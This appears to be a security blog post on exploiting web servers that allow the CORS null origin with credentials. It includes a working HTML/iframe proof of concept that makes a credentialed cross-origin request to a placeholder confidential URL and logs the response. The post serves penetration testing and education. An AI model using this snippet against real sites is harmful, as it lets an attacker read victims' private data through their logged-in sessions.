Exploiting misconfigured CORS Null Origin

Almost two years ago, in October 2016, James Kettle published an excellent blog post about the various types of Cross-Origin Resource Sharing (CORS) misconfigurations and how they can be exploited.

Recently, I encountered a web application that allowed for two-way interaction with the so-called null origin. More precisely, when sending an HTTP request specifying the header:

1

Origin: null

the server would respond with the following two HTTP headers:

1
2

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

This configuration allows us to issue arbitrary requests to the application as long as we can set the Origin header to null. According to Kettle’s blog post, it can be exploited by issuing the request from within an iframe using a data-url as follows:

1

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>*cors stuff here*</script>'></iframe>

Although the code above gives a hint to the right direction, it omits a complete proof of concept. I struggled to find code that would work across the browsers Chrome and Firefox, but eventually succeeded with the following snippet:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

<html>
<body>
<iframe src='data:text/html,<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://vuln-app.com/confidential", true);
xhr.withCredentials = true;
xhr.onload = function () {
    if (xhr.readyState === xhr.DONE) {
            console.log(xhr.response);
    }
};
xhr.send(null);
</script>'></iframe>

</body>

As soon as the page from above is opened, a request to https://vuln-app.com/confidential should be issued with an Origin: null HTTP header and the corresponding HTTP response should be shown in the browser console.